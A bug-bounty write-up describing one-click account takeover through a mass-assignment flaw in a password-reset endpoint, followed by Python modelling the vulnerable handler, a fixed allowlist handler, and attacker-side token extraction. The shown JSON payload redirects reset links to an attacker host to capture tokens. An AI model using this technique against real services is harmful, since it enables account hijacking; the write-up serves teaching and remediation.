One Click To Account Takeover

Hello amazing hunters.

Today, I want to tell a story about my favorite endpoint, again.

In the last story, I showed how I was able to take over a user's account with zero clicks.

Today, I want to try another way to take over an account, but this time we need one click from the user. 😉

On target.com, when we request a password reset, we receive an email containing a reset-password link:

  • Target.com/RestPassword/Token/blablablabla

This time, I focused on stealing the user's token.

In my first try, I injected some headers, like:

  • X-Forwarded-Host
  • X-Forwarded-For

Unfortunately, the site was not vulnerable to host header injection.

In my second try, I noticed something that let me change the host of the reset-password link, but the mechanism was not clear yet.

Here is a golden tip for this scenario: look for mass assignment. If I capture the reset-password request, the JSON body contains a single parameter:

  • {"email": "Evil@attacker.com"}

I asked myself: could this request accept hidden parameters?

Normally, if the client omits a parameter or sends it with a null value, the server fills it with a default. The question is whether sending that parameter explicitly overrides the default.

Unfortunately, I couldn't use Param Miner because the endpoint is rate limited, and after every parameter I tested I had to check the email. So I had to work through my wordlist manually :)

After a short time, I found a simple parameter that let me change the whole host and path of the reset-password link.

When I sent my request with these parameters:

  • {"email": "Evil@attacker.com", "Url": "https://Evill.com/Angel/"}

I got:

Yes, We did it. 😎🥂

To exploit this vulnerability, enter the victim's email, capture the reset request, add the "Url" parameter with a Burp Collaborator URL as its value, and forward the request. The reset email the victim receives now points at a host we control, so a single click from the user is all that stands between us and account takeover.

After the user clicks the link, their token arrives in Burp Collaborator; we then enter that token on the legitimate reset page and ..... 😉
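The following is an added example, not code from the original write-up or from the target: a minimal Python model of the reset handler described above, showing why a client-supplied "Url" field ends up in the victim's email and what the hardened handler looks like, plus the attacker-side step of pulling the token out of the hit that lands on the collaborator host. The field name "Url" and the "/RestPassword/Token/<token>" path layout come from the write-up; the server base URL, the exact way the target concatenated "Url" with the token, and the request-line format are assumptions.

```python
import secrets
from typing import Optional
from urllib.parse import urlparse

# Assumed server-side configuration; the reset link must always be built from this.
SITE_BASE_URL = "https://target.com"


def issue_token() -> str:
    """Constructed stand-in for the per-account reset token the service would persist."""
    return secrets.token_urlsafe(32)


def build_reset_link_vulnerable(body: dict, token: str) -> str:
    """Mass-assignment style handler (assumed): the request's JSON fields are
    merged over the server defaults, so a client-supplied 'Url' silently
    replaces the host and path prefix of the link that reaches the inbox."""
    params = {"email": None, "Url": f"{SITE_BASE_URL}/RestPassword/Token"}
    params.update(body)  # the bug: every incoming key overrides a default
    return f"{params['Url'].rstrip('/')}/{token}"


def build_reset_link_fixed(body: dict, token: str) -> str:
    """Hardened handler: an explicit allowlist of accepted fields, and the
    link base is taken only from server configuration, never from the body."""
    allowed = {"email"}
    unexpected = set(body) - allowed
    if unexpected:
        raise ValueError(f"unexpected fields in reset request: {sorted(unexpected)}")
    if not isinstance(body.get("email"), str) or "@" not in body["email"]:
        raise ValueError("a valid email is required")
    return f"{SITE_BASE_URL}/RestPassword/Token/{token}"


def fixed_accepts(body: dict) -> bool:
    """True when the hardened handler would accept this body (used for checks)."""
    try:
        build_reset_link_fixed(body, "probe")
        return True
    except ValueError:
        return False


def token_from_collaborator_hit(request_line: str) -> Optional[str]:
    """Attacker side: the victim's click sends the whole link to our host, so
    the token is the last path segment of the request line we receive.
    Assumed request-line format: '<METHOD> <target> HTTP/1.x'."""
    parts = request_line.strip().split(" ")
    if len(parts) != 3:
        return None
    path = urlparse(parts[1]).path
    segments = [s for s in path.split("/") if s]
    return segments[-1] if segments else None


if __name__ == "__main__":
    token = issue_token()
    # Constructed attacker request: victim's email plus the hidden 'Url' field.
    attacker_body = {"email": "victim@example.com", "Url": "https://Evill.com/Angel/"}
    evil_link = build_reset_link_vulnerable(attacker_body, token)
    print("link the victim receives from the vulnerable handler:", evil_link)
    # Constructed collaborator log line for the victim's click on that link.
    hit = f"GET /Angel/{token} HTTP/1.1"
    print("token recovered from collaborator hit:", token_from_collaborator_hit(hit))
    print("hardened handler accepts the same body:", fixed_accepts(attacker_body))
    print("hardened handler link:", build_reset_link_fixed({"email": "victim@example.com"}, token))
```

The check a practitioner wants when reviewing a reset flow is the one in `build_reset_link_fixed`: the base of the link must come from server configuration, and any body field the handler does not expect should be rejected rather than merged, since rejecting is also what makes the hidden field visible during manual probing against a rate-limited endpoint.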

I hope this write-up was helpful for you. Have a good day.


Maybe a hunter, but absolutely a movie fan :)